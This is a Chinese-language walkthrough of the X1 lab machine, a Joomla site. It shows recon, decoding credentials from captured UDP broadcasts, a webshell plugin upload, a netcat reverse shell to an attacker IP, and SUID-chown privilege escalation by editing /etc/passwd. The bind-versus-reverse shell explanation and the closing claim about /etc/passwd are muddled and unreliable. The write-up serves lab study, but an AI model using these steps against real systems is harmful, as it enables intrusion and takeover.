X1靶机复盘

一.信息收集

1.1 端口扫描：

┌──(root㉿kali)-[~]
└─# nmap -sV -A -sS -p- 192.168.215.173
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-22 01:02 EDT
Nmap scan report for 192.168.215.173
Host is up (0.00058s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
| http-robots.txt: 16 disallowed entries (15 shown)
| /joomla/administrator/ /administrator/ /api/ /bin/ 
| /cache/ /cli/ /components/ /includes/ /installation/ 
|_/language/ /layouts/ /libraries/ /logs/ /modules/ /plugins/
|_http-server-header: Apache/2.4.62 (Debian)
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
MAC Address: 08:00:27:AD:B7:1A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.58 ms 192.168.215.173

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.08 seconds

扫描到了22和80端口

1.2 目录扫描

┌──(root㉿kali)-[~]
└─# gobuster dir  -u http://192.168.215.173/ -w /usr/share/wordlists/dirb/common.txt -x php,txt,zip
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.215.173/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 280]
/.hta.txt             (Status: 403) [Size: 280]
/.hta                 (Status: 403) [Size: 280]
/.htaccess            (Status: 403) [Size: 280]
/.htaccess.zip        (Status: 403) [Size: 280]
/.hta.zip             (Status: 403) [Size: 280]
/.hta.php             (Status: 403) [Size: 280]
/.htpasswd.php        (Status: 403) [Size: 280]
/.htpasswd.zip        (Status: 403) [Size: 280]
/.htpasswd            (Status: 403) [Size: 280]
/.htaccess.txt        (Status: 403) [Size: 280]
/.htaccess.php        (Status: 403) [Size: 280]
/.htpasswd.txt        (Status: 403) [Size: 280]
/administrator        (Status: 301) [Size: 326] [--> http://192.168.215.173/administrator/]
/api                  (Status: 301) [Size: 316] [--> http://192.168.215.173/api/]
/cache                (Status: 301) [Size: 318] [--> http://192.168.215.173/cache/]
/components           (Status: 301) [Size: 323] [--> http://192.168.215.173/components/]
/configuration.php    (Status: 200) [Size: 0]
/files                (Status: 301) [Size: 318] [--> http://192.168.215.173/files/]
/images               (Status: 301) [Size: 319] [--> http://192.168.215.173/images/]
/includes             (Status: 301) [Size: 321] [--> http://192.168.215.173/includes/]
/index.php            (Status: 200) [Size: 9102]
/index.php            (Status: 200) [Size: 9102]
/language             (Status: 301) [Size: 321] [--> http://192.168.215.173/language/]
/layouts              (Status: 301) [Size: 320] [--> http://192.168.215.173/layouts/]
/libraries            (Status: 301) [Size: 322] [--> http://192.168.215.173/libraries/]
/LICENSE.txt          (Status: 200) [Size: 18092]
/media                (Status: 301) [Size: 318] [--> http://192.168.215.173/media/]
/modules              (Status: 301) [Size: 320] [--> http://192.168.215.173/modules/]
/plugins              (Status: 301) [Size: 320] [--> http://192.168.215.173/plugins/]
/README.txt           (Status: 200) [Size: 5034]
/robots.txt           (Status: 200) [Size: 764]
/robots.txt           (Status: 200) [Size: 764]
/server-status        (Status: 403) [Size: 280]
/templates            (Status: 301) [Size: 322] [--> http://192.168.215.173/templates/]
/tmp                  (Status: 301) [Size: 316] [--> http://192.168.215.173/tmp/]
/web.config.txt       (Status: 200) [Size: 2974]
Progress: 18456 / 18460 (99.98%)
===============================================================
Finished
===============================================================

目录扫描后发现了一个后台地址，试了一下弱口令无果。然后就没有发现什么可用的信息了。但在web主页（还是个joomla的网站）发现了Shark？估计和抓包有关。

二.漏洞探测和利用

使用tcpdump进行抓包：

tcpdump -A -n 192.168.215.173

-A：以 ASCII 格式显示数据包内容（适合查看 HTTP 等明文协议）
-n：不将 IP 地址和端口号转换为域名和服务名（避免 DNS 查询）
host 192.168.215.173：过滤条件，只捕获指定主机的流量

┌──(root㉿kali)-[~]
└─# tcpdump -A -n host 192.168.215.173
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
01:14:00.568387 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...].@.@.D..........f...	1.r.................
01:14:01.568918 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...^B@.@.D8.........f...	4.o.................
01:14:02.569864 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...^.@.@.C..........f...	4.o.................
01:14:03.555984 ARP, Reply 192.168.215.149 is-at be:90:0d:14:3a:ef, length 46
............:.......'.........................
01:14:03.570485 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E..._.@.@.B..........f...	/.t.................
01:14:04.571266 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E..._.@.@.B..........f...	i.:.................
01:14:05.572639 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...`.@.@.A..........f...	s.0.................
01:14:06.573245 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...`.@.@.A..........f...	s.0.................
01:14:07.575612 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...a	@.@.Aq.........f...	?.d.................
01:14:08.575261 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...a.@.@.@..........f...	B.a.................
01:14:09.575737 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...b/@.@.@K.........f...	>.e.................
01:14:10.576951 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...b.@.@.?..........f...	j.9.................
01:14:11.577919 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...c.@.@.?z.........f...	>.e.................
01:14:12.579059 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...cb@.@.?..........f...	p.3.................
01:14:13.579527 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...c.@.@.>..........f...	s.0.................
01:14:14.580549 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...d~@.@.=..........f...	n.5.................
01:14:15.581968 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...d.@.@.=..........f...	q.2.................
01:14:16.582744 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...e3@.@.=G.........f...	=.f.................
01:14:17.582799 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...e.@.@.<..........f...	A.b.................
01:14:18.582829 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...fl@.@.<..........f...	q.2.................
01:14:19.583656 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...f.@.@.;..........f...	q.2.................
01:14:20.584942 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...g.@.@.;v.........f...	n.5.................
01:14:21.584519 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...g.@.@.:..........f...	n.5.................
01:14:22.585250 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...hx@.@.:..........f...	o.4.................
01:14:23.586363 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...i#@.@.9W.........f...	s.0.................
01:14:24.587307 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...i.@.@.8..........f...	k.8.................
01:14:25.588206 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...i.@.@.8..........f...	r.1.................
01:14:26.589368 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...i.@.@.8..........f...	k.8.................
01:14:27.589576 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...j.@.@.7..........f...	q.2.................
01:14:28.589566 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...kF@.@.74.........f...	m.6.................
01:14:29.590355 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...l4@.@.6F.........f...	s.0.................
01:14:30.591045 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...l.@.@.5..........f...	q.2.................
01:14:31.591903 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...m#@.@.5W.........f...	p.3.................
01:14:32.592596 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...m.@.@.4..........f...	k.8.................
01:14:33.593930 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...n.@.@.3..........f...	p.3.................
01:14:34.594443 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...o|@.@.2..........f...	@.c.................
01:14:35.594870 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...o.@.@.2..........f...	>.e.................
01:14:36.595925 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...p.@.@.2u.........f...	r.1.................
01:14:37.071817 ARP, Reply 192.168.215.149 is-at be:90:0d:14:3a:ef, length 46
............:.......'.........................

这串流量包很规律，给它输入到文本里（需要等一会 2分钟左右，在curl+c）

tcpdump -A -n host 192.168.215.173 > demo

然后使用awk进行过滤：

cat demo | awk ‘BEGIN{FS=””}/^E/{printf $(NF-17)}’ 2>/dev/null

补充(可不看)：

查看字符长度:

echo -n 00dae9e3052fb2255408182602383ce1 |wc -c

使用ssh进行登录root用户，发现登录不了（如果要是登录成功了，这道题就也太easy了），登录一下目录扫描的管理员页面。可以选择汉化包（群主还是十分的人性化的哈哈）

三. get shell

在系统管理界面发现了扩展上传，（这里的思路和Wordpress很像）

前面信息收集的时候说过是joomla搭建的网站，搜索一下有没有joomla的webshell相关插件

进行下载

上传：

getshell利用方式:

成功利用：

反弹shell：

这里需要注意一下，反弹shell的语句是

nc 192.168.215.222 4444 -e /bin/bash

和这个的区别 nc -e /bin/bash 192.168.215.222 4444

正向 Shell（Bind Shell）：nc 192.168.215.222 4444 -e /bin/bash
功能：该命令尝试连接到指定 IP（192.168.215.222）的 4444 端口，并期望目标主机已经在该端口绑定了一个 shell。
场景：通常用于攻击者主动连接到已经开放了 shell 服务的目标机器。
参数顺序的影响

2.反向 Shell（Reverse Shell）：nc -e /bin/bash 192.168.215.222 4444
功能：该命令会主动连接到指定 IP（192.168.215.222）的 4444 端口，并将本地的 bash shell 通过这个连接传输出去。
场景：通常用于被控制端（如受害者机器）主动连接到攻击者的监听端，形成反向控制。

四. 提权

查看了以下SUDO发现什么也没有。查看了SUID发现了一个chown文件

find / -perm -u=s -type f 2>/dev/null

chown:

更改文件或目录的所有者和所属组的命令:

chown www-data:www-data /etc/passwd

在kali上生成一个自己已知的密码,注意每次生成的密码都不相同（撒盐也不影响使用）

openssl passwd 123456

更改root的密码,得到了root的用户

www-data@X1:/$ vim /etc/passwd
www-data@X1:/$ su root
Password: 
root@X1:/# id
uid=0(root) gid=0(root) groups=0(root)
root@X1:/#

总体思路：

使用有SUID的chown命令将/etc/passwd文件改为www用户的文件（www就有了写的权限）
在kali上自己生成一个密码，用来替换掉root后面的x（密码占位符）
登录靶机的root用户，密码是自己生成的

五. 总结

前中期：这个靶机获取getshll的方式和Wordpress相关靶场的思路很像，多出来了一个抓包的过程，我是用了Tcpdump和Awk的形式进行解决，抓包也可以使用Wireshark工具，但是比较麻烦

后期：使用了SUID的提权方式，主要就是使用chown命令，让www用户对root进行改密码的操作。但是：

正常系统：直接修改 /etc/passwd 中的密码字段不会生效，系统仍使用 /etc/shadow。
异常情况：仅当 /etc/shadow 不存在或权限错误时，修改 /etc/passwd 才可能生效，但这是严重的安全漏洞。
永远不要手动编辑 /etc/passwd 或 /etc/shadow，始终使用 passwd、usermod 等工具管理密码。

Maze-sec靶机系列

#复盘

X1靶机复盘

http://example.com/2025/05/22/X1靶机复盘/

作者

XCDH

发布于

2025年5月22日

许可协议

chisel工具的使用上一篇

Zui工具的使用下一篇